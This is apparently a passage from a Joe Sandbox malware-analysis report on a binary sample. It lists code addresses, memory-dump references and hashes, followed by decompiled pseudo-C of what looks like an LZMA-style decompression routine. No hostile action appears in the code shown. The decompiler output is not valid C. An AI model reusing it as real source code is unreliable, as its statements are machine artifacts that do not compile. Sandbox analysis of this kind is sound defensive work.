0x00406cd3
0x00406cd6
0x00406cd9
0x00406cdb
0x00406cdb
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce7
0x00406cea
0x00406ced
0x00406cee
0x00406cf0
0x00406cf0
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406cfc
0x00406cfc
0x00406cff
0x00406d01
0x00406d01
0x00000000
0x00000000
0x00406f43
0x00406f43
0x00406f43
0x00406f47
0x00000000
0x00000000
0x00406f4d
0x00406f4d
0x00406f50
0x00406f53
0x00406f56
0x00406f58
0x00406f58
0x00406f58
0x00406f5b
0x00406f5e
0x00406f61
0x00406f64
0x00406f67
0x00406f6a
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00406f70
0x00406f73
0x00406f76
0x00406f79
0x00406f7c
0x00406f80
0x00406f82
0x00406f85
0x00000000
0x00406f87
0x00406f87
0x00406d04
0x00406d04
0x00000000
0x00406d04
0x00406f85
0x004071ba
0x004071ba
0x00000000
0x00000000
0x004067e9
0x004071f1
0x004071f1
0x00000000
0x004071f1
0x0040703e
0x004070be
0x00407087

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406F8C() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4)); // executed
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8)); // executed
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
